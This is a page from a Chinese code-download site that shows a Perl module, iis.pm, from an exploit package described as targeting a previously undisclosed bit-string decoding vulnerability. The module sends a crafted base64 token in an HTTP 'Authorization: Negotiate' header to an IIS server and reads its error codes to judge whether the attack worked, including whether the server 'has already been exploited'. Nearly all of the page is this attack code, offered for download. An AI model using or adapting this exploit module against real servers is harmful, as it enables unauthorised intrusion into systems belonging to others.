⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 iis.pm

📁 I. Introduction This code exploits a previously undisclosed vulnerability in the bit string deco
💻 PM
字号:
package IIS;use strict;use MIME::Base64;use IO::Socket;## Exploit IIS through the Negotiate authentication scheme#sub exploit{	my $host = shift;	my $port = shift;	my $token = shift;	if (!$host || !$port || !$token) {		die "Invalid parameters in IIS::exploit\n";	}	my $request =		"GET / HTTP/1.0\r\n" .		"Host: $host\r\n" .		"Authorization: Negotiate " . encode_base64($token, "") . "\r\n" .		"\r\n";	print "  HTTP request is " . length($request) . " bytes long.\n";	print "  Sending request...\n";		my $sock = new IO::Socket::INET (PeerAddr => $host,	                                 PeerPort => $port,	                                 Proto => 'tcp')		or die "Could not connect to $host:$port : $!\n";		print $sock $request;	my $response;	while (<$sock>) {		$response .= $_;	}	if ($response =~ /0x80090301/) {		die "Server does not support the Negotiate protocol or it has already been exploited.\n";	}	elsif ($response =~ /0x80090304/) {		print "  Server responded with error code 0x80090304\n";	}	else {		print "  Unknown server response:\n\n";		my @response = split "\n", $response;		my $i;		for ($i = 0; $i < 10 && $i <= $#response; $i++) {			print $response[$i] . "\n";		}		print "[" . ($#response-$i) . " more lines]\n\n";	}	return 1;}1;

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -